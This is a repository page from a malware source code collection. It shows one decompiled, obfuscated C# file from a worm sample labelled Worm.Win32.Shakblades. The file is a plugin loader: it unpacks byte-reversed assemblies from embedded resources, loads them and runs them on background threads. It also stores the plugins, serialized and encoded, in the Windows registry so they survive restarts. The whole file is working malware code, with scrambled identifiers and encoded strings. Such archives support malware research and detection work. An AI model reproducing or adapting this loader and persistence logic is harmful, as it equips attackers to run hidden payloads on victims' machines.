ch0ic3/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2024-12-22 19:36:11 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
71cdcf7dce
MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/ᙐᗡѬᵲ૦ᵛଔѥቾ.cs

202 lines
8.4 KiB
C#
Raw Normal View History

auto-decompiled msil via petikvx add
2022-08-18 11:28:56 +00:00
// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᙐᗡѬᵲ૦ᵛଔѥቾ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using Microsoft.Win32;
using Plugin;
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.Serialization.Formatters.Binary;
using System.Threading;
namespace Ҧ߲ʽ
{
public class Ѭѥ
{
public static SortedList<Guid, byte[]> \u0382Ⴊ\u19CD\u0DF1в = new SortedList<Guid, byte[]>();
public static SortedList<Guid, IPlugin> = new SortedList<Guid, IPlugin>();
private static string \u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
public static event Ѭѥ. \u0C11\u0FBFᵥރតൃĚŹᗐ;
public static void ()
{
try
{
BinaryFormatter binaryFormatter = new BinaryFormatter();
MemoryStream serializationStream = new MemoryStream();
binaryFormatter.Serialize((Stream) serializationStream, (object) Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в);
serializationStream.Close();
byte[] numArray = \u1928ᔾዔ.(serializationStream.ToArray(), false);
if (ȩזڹ.Փ̗ == RegistryHive.CurrentUser)
Registry.CurrentUser.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזڹ.ެΙά\u066A, (object) numArray);
else
Registry.LocalMachine.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזڹ.ެΙά\u066A, (object) numArray);
}
catch
{
}
}
public static void ʉͧ\u05CB\u00A9դܛ() => new Thread((ThreadStart) (() =>
{
try
{
BinaryFormatter binaryFormatter = new BinaryFormatter();
MemoryStream memoryStream;
byte[] numArray1;
if (ȩזڹ.Փ̗ == RegistryHive.CurrentUser)
{
MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.\u09D1য়᪷(Registry.CurrentUser.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזڹ.ެΙά\u066A) as byte[], false));
Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
serializationStream.Close();
serializationStream.Dispose();
memoryStream = (MemoryStream) null;
numArray1 = (byte[]) null;
}
else
{
MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.\u09D1য়᪷(Registry.LocalMachine.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזڹ.ެΙά\u066A) as byte[], false));
Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
serializationStream.Close();
serializationStream.Dispose();
memoryStream = (MemoryStream) null;
numArray1 = (byte[]) null;
}
foreach (byte[] numArray2 in (IEnumerable<byte[]>) Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в.Values)
Ѭѥ.ͷ݁ȁ\u0EF1ቺ\u002F(numArray2);
}
catch
{
}
})).Start();
public static void dz() => new Thread((ThreadStart) (() =>
{
try
{
if (Assembly.GetExecutingAssembly().GetManifestResourceNames().Length == 0)
return;
ResourceManager resourceManager = new ResourceManager("p", Assembly.GetExecutingAssembly());
int num = (int) resourceManager.GetObject("Len");
for (int index = 0; index < num; ++index)
{
byte[] numArray = (byte[]) resourceManager.GetObject(index.ToString());
Array.Reverse((Array) numArray);
Ѭѥ.ͷ݁ȁ\u0EF1ቺ\u002F(numArray);
}
if (!ȩזڹ.ũކߠ)
return;
Ѭѥ.();
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
})).Start();
public static bool ͷ݁ȁ\u0EF1ቺ\u002F(byte[] _param0)
{
try
{
foreach (Type type in Assembly.Load(_param0).GetTypes())
{
int num = 0;
if (type.IsClass && type.IsSubclassOf(typeof (IPlugin)))
{
IPlugin instance = (IPlugin) Activator.CreateInstance(type);
if (instance.ExecuteOnLoad)
{
instance.Initialize();
Ѭѥ.Đȃ((object) null, instance, instance.ExecuteOnLoadArgs);
}
if (!Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в.ContainsKey(instance.Guid))
Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в.Add(instance.Guid, _param0);
else
++num;
if (!Ѭѥ..ContainsKey(instance.Guid))
Ѭѥ..Add(instance.Guid, instance);
else
++num;
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
if (num == 2)
{
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = instance.Name + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
return false;
}
if (Ѭѥ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
Ѭѥ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, instance);
return true;
}
}
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("dp+UpqZTqpynm1N8g5+ompyhUzOdE72coaeYpZmUlphToaKnU5miqKGXYQ==", true);
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = ex.Message;
}
return false;
}
public static bool ќ\u0B76ୁ(IPlugin _param0)
{
if (!Ѭѥ..ContainsKey(_param0.Guid))
{
Ѭѥ..Add(_param0.Guid, _param0);
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
if (Ѭѥ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
Ѭѥ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, _param0);
return true;
}
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = _param0.Name + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
return false;
}
public static void \u136Eᐰ\u1CAA\u0EE1ள(Guid _param0)
{
if (!Ѭѥ..ContainsKey(_param0))
return;
Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в.Remove(_param0);
Ѭѥ..Remove(_param0);
}
public static string \u0CC0() => Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ;
public static void Đȃ(object , IPlugin _param1, PluginArgs _param2) => new Thread((ThreadStart) (() =>
{
try
{
_param1.Execute(, _param2);
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
})).Start();
public static void \u0ECFȐفᅵټ༵୩()
{
try
{
if (!ȩזڹ.ũކߠ)
return;
if (ȩזڹ.Փ̗ == RegistryHive.CurrentUser)
Registry.CurrentUser.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזڹ.ެΙά\u066A);
else
Registry.LocalMachine.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזڹ.ެΙά\u066A);
}
catch
{
}
}
public delegate void (object sender, IPlugin plugin);
}
}
Reference in New Issue Copy Permalink